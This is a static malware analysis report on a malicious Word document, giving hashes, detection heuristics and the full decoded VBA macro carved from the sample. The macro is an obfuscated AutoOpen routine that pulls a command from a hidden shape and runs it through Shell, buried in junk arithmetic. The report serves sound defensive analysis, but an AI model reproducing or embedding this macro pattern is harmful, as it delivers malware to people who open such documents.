Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc129b8cfdcacaeb…

MALICIOUS

Office (OLE)

Size: 141.9 KB
Created: 2018-12-11 11:41:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: 79abe79c89e73bdf72e689d721f80d3e
SHA-1: f388f4000794aa32e043ea72507055250612fc8c
SHA-256: fc129b8cfdcacaebbc790822bcc330bbbeed319c1b3d0d6f51f025647dae89da
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6780293-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6780293-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     _
    .Shell(WjKDKLzIsAn, VMXFcS), ZkZGAI)
       FnWcvNalYIEimfrzXH = (31411959 + Round(kFEWXEZrWtCzELCprNIf) * 255998035 - AYIVWkKhzjvmkzjAEroiO + (FFZbdBIJwZtCFjNBhohp / Tan(WERaCGqJRrETVSCwuHIYnhVs)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    smwCNc
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4971 bytes
SHA-256: e73fffbe2e4c92c934aa4b5086734b60a3a2f00521ea50b4671db774182ebc35
Detection
ClamAV: No threats found
Obfuscation or payload: likely
138 of 174 identifiers look randomly generated (e.g. 'DbzDbkZIwEnrucotLYofuzUG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wSqqXWzqQm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
smwCNc
End Sub

Attribute VB_Name = "kuHzKOECqQn"
Function smwCNc()
On Error Resume Next
   lDjticiSYIWsXESGpjdRfoq = (8588623 + Round(CBAqHwYMKzfQrndDwa) * 225763977 - opJicnwYvNwNfW + (aicRLwfNEmpztAOhOIA / Tan(NsVOUzzRwDSlVLCYVJWCI)))
ErmqDYhfhEfnOiIOzLw = 92794845
   zSBkASuBRMXhBzi = (71072537 + Round(TWsiGkOWaujjhzYcEHCz) * 149367966 - kZRUREsbVEOhfUDYr + (nOaYLSjMwEzpbKIFlSRmT / Tan(iwYiUAUEZfQUMIn)))
OzkEGnifdDYZikHE = 99147209
   WFZIKjpCAasIFfj = (55172999 + Round(YpsNBOaGLVQBCqhFmfLBmLIj) * 58166657 - IjCHDUrOoTVtUqz + (wKYAzkLDTzVGLM / Tan(JEvGtDDSwJoBNksKUCkNz)))
HIYVzoDwlDcmLpZk = 35302115
   dzfGzuldYEtbtfbkGs = (104346743 + Round(BsztuYUUamUsvhRKYQl) * 127679854 - wTPjrohAKXuDnVkCmMYaR + (mjAjLOQMpGwsFZ / Tan(JDkmTQOapILjIlENsRshf)))
KcSkzinGuQLTcInnwnXIL = 159971706
Const VMXFcS = 0
   BPfTPUrVcKEOSRoUw = (44893825 + Round(ifDGfkFvjtftsAX) * 48802747 - tlElRBvbXVJFHZFNwllz + (AjJZIbzRMNvKIaMC / Tan(RdIiHOwqbTajwPlJXt)))
uLJZwKLIOuzzsK = 172700105
   RjCPMDiKwOjoFnpPu = (13834471 + Round(ftjbbijmjvAvbBNDwSFj) * 172577424 - hEUAoWilJBIaOVlHbhfRuPv + (EmsjrwoSFoLbHatJH / Tan(mzmBmsSqrYDIwSIBwBiutMMq)))
aJJABnWKwdwfCAzRBF = 106603353
Set rtTFisfME = wSqqXWzqQm.Shapes(crGwbYj + "JGZYhcdBJ" + pvXvqz)
   dRAKERrMRiIiwXoKDzidX = (66627648 + Round(MAvZAjicrbjtRZwNVPMpaJ) * 193059781 - fPGoOiGJTdoKIsr + (jBRHRdWlFjMOKUNDXmuk / Tan(tONUWZnloFdYjGYrVrBs)))
jiRszzQkmVwGzpnEmv = 29485011
   sLiLmEpOdkUNNKwqSwr = (280585983 + Round(hSFwMdnPhbYbikHkhjjBmfBh) * 169461095 - CPdMuZDbLtdOZbCw + (IvlfZrFkQHpLBQYXDaYmVjzY / Tan(ZNHTGHwojtloicX)))
biRNPJcErWBdLabwMZA = 192554623
   zfZNBijrvqatVvIGzGUU = (41027121 + Round(kiQowYjkRmCsfdsbaWsCdS) * 297897372 - BwjwUCciWHvqzMkLLLZ + (rcQfNVjwcDLSpsnCphQPJT / Tan(XiBiNlhrStEjYjElwW)))
GTwdBEZiVdvKfXGswMrS = 82378656
   ZlaFOrfDJKYiLAPuEXr = (315503575 + Round(ZSzwhorjNawnwb) * 107642218 - YCsmidYXSwTCFci + (qWzSaJhCnTvkZqOZzljV / Tan(JVvtbdiVpilvRzZbziPVqwOi)))
wbkuDTwJijBEYzfwhzpJoH = 298359146
   CYcPacUjczJhoFnUBd = (234267927 + Round(IcJvifFNGVBouCzRFhWZvzh) * 173162480 - MCNhIzdckMaPhkuW + (aHwVmlIVOUHJzJu / Tan(jSdsjwVYMKqWCYwbDoZZc)))
ZQFLtfVSkDfjwSRiablaIbv = 249700487
   jStbhVomGXisiOcNuwjhqi = (112826653 + Round(wcWJmUmbUMvLsSoljudZdn) * 51475572 - GnRiFNzBBHdFwiAlkDYSTRVc + (wzvBrIKUXDwDIWG / Tan(tJlpjnFuroaPpfpSp)))
GPBzKwSkabBicjRCZI = 236341538
   vwPtVjvnjEKvsTb = (6567271 + Round(MjzTjwUEGiIZtdSvLYwnO) * 132708235 - ijdUviLXiWMLjCqOAvoP + (nNnbrzjvfNUszVmCbZauLiDj / Tan(itVJvsZEirSptDifb)))
IsTjjDLYWNVmJJHIJFLljVun = 114901924
   ttoMziEVwLizbWvt = (99197641 + Round(qSjJiwfVudrDtQa) * 237298954 - ZBDoPcwGXUtZvKKPIbrd + (KpjdoaitSNWrrWrMSbqkD / Tan(ilwzThnkoiGwOMWL)))
BSMFGXhDoSDqABtfALu = 218091677
   RaofIzPawMIAqnwrmjzKqT = (124328606 + Round(ErWAtdRXnWdWwaYl) * 264219970 - zLroRcYNwjXLzzHabR + (OhUvkMUKbtLIMVVVHVP / Tan(tcfjkAcXfOXwHKZncPH)))
zRzUkYLpdbAFMqhmCoK = 239185042
   DbzDbkZIwEnrucotLYofuzUG = (184330695 + Round(CWjtwFbvzKnvwnkk) * 157612 - UwilRNfUKPCFHrbOhCcC + (hQzfiGQbAvJzqld / Tan(RFSOcvLtrDvUiGhHzWnii)))
mGPsKUsIQFwjQzJ = 262055375
WjKDKLzIsAn = rtTFisfME.TextFrame.TextRange + GnbLw + OBzUzuDK + zjkrA + pVBqjzK + iYSLv + QGqJwIDc + wowBNGE + QfrHQjlU + arDiDp + ZphSZ
   WVibVjSNjToVjWm = (236204356 + Round(tAjzjQnklnrTfZSaYdRdqz) * 304639851 - GAcKqtODEqOInGnFqqksa + (DuWvKtVGwvGztindtrZoPpK / Tan(mRqLmANBKNzhoviV)))
ztTCpNESNztTmdOjMItCJ = 131248540
   QPuuOXNwCHNMSlhnwGJuWT = (219494221 + Round(EjRsWPFWbBCJjC) * 148971722 - okPELmRiwZUmvQRziup + (FVanCrkRjYEvjkGlDdoR / Tan(nuzuSaKjEaoNrUTKc)))
UBAvaUZDLKjtFF = 158956396
   FTdlIzaHzXUBZfTbht = (99799354 + Round(usqKRozaqYiETdzrr) * 325838808 - faljNwBClzBXzvjcMcTU + (zzQatQhvibjjMjnJJd / Tan(PlOdoBjInAkOYdMib)))
ITfUHDVRnlMtTDzEEi = 233700179
   jlLjiDpVJDYOFKR = (71452293 + Round(NRzqhUCIzRCKVS) * 37813225 - QiJlNCdZwObapmYpNYwoKQwQ + (YhmnLokSPpcHZnK / Tan(XsStbSKsNzzTRozjtbpVrm)))
aqHazwhnlnAmXfXhFXtZNq = 113370327
ptOwzpw = Array(FsCUrMwf, MfRCb, Vujwz, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(WjKDKLzIsAn, VMXFcS), ZkZGAI)
   FnWcvNalYIEimfrzXH = (31411959 + Round(kFEWXEZrWtCzELCprNIf) * 255998035 - AYIVWkKhzjvmkzjAEroiO + (FFZbdBIJwZtCFjNBhohp / Tan(WERaCGqJRrETVSCwuHIYnhVs)))
uCmCJzBZijBIBavRAhipi = 236249817
   ptmkhbYBDlBdnPLoNikc = (231383199 + Round(qZcNwTjjdPmzFmzmrZo) * 14222758 - QfKbjbvEiEstOD + (ITcESWIlrnJZoamK / Tan(jXauSmPrnbvKtGrimiYzjk)))
HuToaCHiwuEMrcTqjNNi = 306567375
   sOuaqnozfJRuAMJWo = (312124861 + Round(tzObIlZZlNniElOUts) * 167453035 - QKNKTfbSQzDGXOOVimloRNDj + (aNJmrQiPzFjjEIdKGJmKjLq / Tan(sqGGkiCHiSsSSjYiZr)))
IimZiIiKDQZKPWmtBJY = 200321569
End Function